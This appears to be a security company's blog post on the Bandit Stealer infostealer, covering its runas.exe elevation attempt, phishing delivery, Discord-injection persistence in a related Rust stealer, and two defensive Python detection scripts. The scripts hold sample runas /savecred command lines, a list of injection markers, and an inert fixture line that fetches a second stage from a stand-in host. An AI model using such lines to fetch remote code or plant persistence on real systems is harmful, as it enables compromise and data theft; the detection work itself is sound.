
Bandit Stealer – A Stealthy Malware Targeting Browsers and Crypto

  • Post category: Blog

Executive Summary. Bandit Stealer is a recently identified information-stealing malware that targets web browsers and cryptocurrency wallets. Written in Go, it uses the Windows runas.exe utility in an attempt to run itself with administrator privileges, hides its presence, and harvests personal data. Criminals distribute it through phishing emails. Vigilance and robust security measures are crucial in combating this developing threat.

Watch the BruceCast™ episode where we discuss the Bandit info stealer malware.

Check out the Triad Network Security video that reviews the Bandit info stealer malware.

Bandit Stealer: A Stealthy Malware Targeting Browsers and Crypto Wallets

Cybersecurity researchers at Trend Micro have reported a new information-stealing malware known as Bandit Stealer. It is getting attention because it targets multiple web browsers and cryptocurrency wallets in a single sample.

Where did Bandit come from?

Bandit Stealer is written in Go, which makes it easy to port to other operating systems even though the samples seen so far target Windows. To elevate privileges it invokes the built-in runas.exe utility to relaunch itself under an administrator-level account. Note that runas.exe is not an exploit: it still requires the target account's password and does not bypass UAC, so a stealer relying on it only gains admin rights where those credentials are available or the prompt is satisfied. The attempt itself is a useful detection signal, because ordinary users rarely launch runas.exe from a freshly dropped executable.
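The following is an added example, not code from the page or from Trend Micro, showing how a detection engineer might flag the runas.exe behaviour described above in process-creation telemetry. The records are constructed, and the field names ParentImage, Image and CommandLine are assumptions about the log source (they mirror Sysmon Event ID 1, but map them to whatever your sensor emits).

```python
"""Flag runas.exe launches that look like a dropped executable trying to
relaunch itself as an administrator.

Added example (not code from the page or from Trend Micro). The records below
are constructed in a Sysmon-like key=value layout; the field names
ParentImage, Image and CommandLine are assumptions about your telemetry.
"""
import re

# Constructed process-creation records. Only the last two should be flagged.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=cmd.exe",
    "ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|Image=C:\\Windows\\System32\\runas.exe"
    "|CommandLine=runas /user:CORP\\jsmith \"C:\\Program Files\\Tool\\tool.exe\"",
    "ParentImage=C:\\Users\\alice\\AppData\\Local\\Temp\\Invoice.exe"
    "|Image=C:\\Windows\\System32\\runas.exe"
    "|CommandLine=runas.exe /user:Administrator \"C:\\Users\\alice\\AppData\\Local\\Temp\\Invoice.exe\"",
    "ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|Image=C:\\Windows\\System32\\runas.exe"
    "|CommandLine=runas /savecred /user:Administrator \"C:\\Users\\bob\\AppData\\Roaming\\svc.exe\"",
]

# Built-in accounts an opportunistic elevation attempt would name.
ADMIN_ACCOUNTS = {"administrator"}

# Locations a phishing payload typically drops into (user-writable, no admin needed).
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\appdata\\|\\programdata\\|\\users\\public\\", re.IGNORECASE
)

# Tokenizer that keeps quoted Windows paths together.
TOKEN = re.compile(r'"[^"]*"|\S+')


def parse_event(line):
    """Split 'Key=value|Key=value' into a dict."""
    return dict(part.split("=", 1) for part in line.split("|"))


def basename(path):
    """Lower-cased file name of a (possibly quoted) Windows path."""
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def parse_runas(cmdline):
    """Return (user, program, savecred) for a runas command line, else None."""
    tokens = TOKEN.findall(cmdline)
    if not tokens or basename(tokens[0]) not in ("runas", "runas.exe"):
        return None
    user, program, savecred = None, None, False
    for tok in tokens[1:]:
        low = tok.lower()
        if low.startswith("/user:"):
            user = tok[len("/user:"):]
        elif low == "/savecred":
            savecred = True
        elif not low.startswith("/"):
            program = tok.strip('"')
    return user, program, savecred


def suspicious_runas(events):
    """Return [(parent, program, [reasons])] for runas launches worth a look."""
    hits = []
    for line in events:
        ev = parse_event(line)
        if basename(ev["Image"]) != "runas.exe":
            continue
        parsed = parse_runas(ev["CommandLine"])
        if parsed is None:
            continue
        user, program, savecred = parsed
        reasons = []
        if user and user.rsplit("\\", 1)[-1].lower() in ADMIN_ACCOUNTS:
            reasons.append("targets the built-in Administrator account")
        if savecred:
            reasons.append("uses /savecred to avoid a password prompt")
        if program and USER_WRITABLE.search(program):
            reasons.append("program runs from a user-writable path")
        if program and ev["ParentImage"].lower() == program.lower():
            reasons.append("parent is relaunching itself via runas")
        if reasons:
            hits.append((ev["ParentImage"], program, reasons))
    return hits


if __name__ == "__main__":
    for parent, program, reasons in suspicious_runas(SAMPLE_EVENTS):
        print(f"{parent} -> runas {program}: {'; '.join(reasons)}")
```

The second sample record (an administrator launching a tool under Program Files as a named domain user) is deliberately left unflagged: runas.exe itself is a normal administrative tool, so the rule keys on the combination of a built-in admin account, a user-writable program path, /savecred, or a process relaunching its own image rather than on the utility alone.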

Bandit distribution

Bandit Stealer spreads through phishing emails, posing as a harmless Microsoft Word attachment.

The malware runs in the background while the opened Word document keeps the user's attention. Trend Micro has also found a fake installer for Heart Sender used to trick users into launching the embedded malware, and, separately, a Rust-based info stealer that targets Windows systems.

That Rust-based stealer uses a GitHub Codespaces webhook as its exfiltration channel, so the stolen data leaves the network toward a legitimate developer service rather than an obviously malicious domain. It steals data from web browsers, saved credit cards, cryptocurrency wallets, and platforms such as Steam and Discord, and it achieves persistence by modifying the installed Discord client to inject JavaScript code that runs every time Discord starts. Because the Discord client is an Electron application, its modules are plain JavaScript files on disk, so a patched loader can be spotted by comparing it with a known-good copy.
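As an added example (not code from the page or from the malware authors), here is an integrity check for the Discord persistence technique described above. It assumes the standard Discord install layout on Windows, <root>\app-<version>\modules\discord_desktop_core-<n>\discord_desktop_core\index.js, and that the untouched index.js consists of a single require() of core.asar; both are assumptions, so verify them against a clean install before relying on the check. The sample install it scans is constructed in a temporary directory, and the "injected" code is an inert stand-in that is never executed.

```python
"""Integrity check for the Discord desktop core module that stealers patch
for persistence.

Added example, not code from the page or from Trend Micro. It assumes the
standard Discord install layout on Windows:
  <root>\\app-<version>\\modules\\discord_desktop_core-<n>\\discord_desktop_core\\index.js
and that the untouched index.js is a single require() of core.asar.
"""
import tempfile
from pathlib import Path

# What a clean discord_desktop_core/index.js contains (assumption, see lead-in).
CLEAN_INDEX_JS = "module.exports = require('./core.asar');"

# Strings that have no business in a one-line module loader.
INJECTION_MARKERS = ("https", "child_process", "webhook", "fetch(", "XMLHttpRequest", "eval(")


def scan_discord_install(root: Path):
    """Return [(relative path, reason)] for every core-module index.js that is
    not the clean loader."""
    findings = []
    pattern = "app-*/modules/discord_desktop_core-*/discord_desktop_core/index.js"
    for index_js in sorted(root.glob(pattern)):
        text = index_js.read_text(encoding="utf-8", errors="replace")
        if text.strip() == CLEAN_INDEX_JS:
            continue
        markers = sorted(m for m in INJECTION_MARKERS if m in text)
        reason = ("extra code: " + ", ".join(markers)) if markers else "content differs from clean loader"
        findings.append((index_js.relative_to(root).as_posix(), reason))
    return findings


def build_sample_install(root: Path):
    """Write a constructed two-version install: one clean module and one whose
    loader has extra code appended, the shape a stealer's injection takes."""
    clean = root / "app-1.0.9013" / "modules" / "discord_desktop_core-1" / "discord_desktop_core"
    clean.mkdir(parents=True)
    (clean / "index.js").write_text(CLEAN_INDEX_JS + "\n", encoding="utf-8")

    tampered = root / "app-1.0.9014" / "modules" / "discord_desktop_core-1" / "discord_desktop_core"
    tampered.mkdir(parents=True)
    # Inert stand-in for injected code: the clean line followed by a loader that
    # would pull a second stage over HTTPS. It is only ever read, never run.
    (tampered / "index.js").write_text(
        CLEAN_INDEX_JS + "\n"
        "const https = require('https');\n"
        "https.get('https://example.invalid/stage2.js', r => { /* ... */ });\n",
        encoding="utf-8",
    )


def demo():
    """Build the sample layout in a temp dir, scan it and return the findings."""
    root = Path(tempfile.mkdtemp(prefix="discord-demo-"))
    build_sample_install(root)
    return scan_discord_install(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"TAMPERED {path}: {reason}")
```

On a real machine, point scan_discord_install at the Discord install root (typically %LOCALAPPDATA%\Discord) rather than calling demo(). A hit means the loader has been altered; restoring it is not enough on its own, because whatever wrote the injection is still on the host and can write it again.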

Like other so-called "commodity" stealers, including Luca, StrelaStealer, DarkCloud, WhiteSnake, and Invicta Stealer, Bandit is distributed mainly through spam emails and trojanized copies of popular apps.

Cybercriminals also use hijacked YouTube channels to advertise pirated software bundled with stealer malware to millions of viewers.

What do criminals achieve with Bandit?

Information stolen by Bandit and similar strains is used for:

  • Identity theft.
  • Financial theft.
  • Data breaches.
  • Credential stuffing attacks.
  • Account takeovers.
  • Other follow-on fraud.

Selling the stolen data to other threat actors enables follow-on attacks such as targeted campaigns, ransomware, or extortion.

The 30,000-foot view

Stealer malware is evolving quickly because ready-made tooling is available in the malware-as-a-service (MaaS) market.

SecureWorks CTU reports a thriving infostealer market, with a 670% increase in stolen logs offered on forums such as Russian Market, which now lists far more logs than its competitors. The underground economy built around info stealers offers lucrative opportunities even to low-skilled threat actors.

Law enforcement actions have had limited impact, because operators adapt by moving to platforms such as Telegram. Individuals and organizations should stay alert and apply strong security controls: keep software up to date, use strong unique passwords with multi-factor authentication where available, treat unexpected emails and attachments with suspicion, and run reputable antivirus or endpoint protection software.

Go Further with Triad Network Security

The discovery of Bandit Stealer and its targeting of browsers and crypto wallets underlines the need for continuous monitoring and proactive defenses. The threat landscape keeps changing, and staying informed about the latest threats is vital for effective protection. Follow us on Twitter and LinkedIn for updates and exclusive content.

Book your free Business Strategy Session with Triad Network Security.

Schedule a convenient day and time on our online booking page.

Triad Network Security, LLC


864-660-9804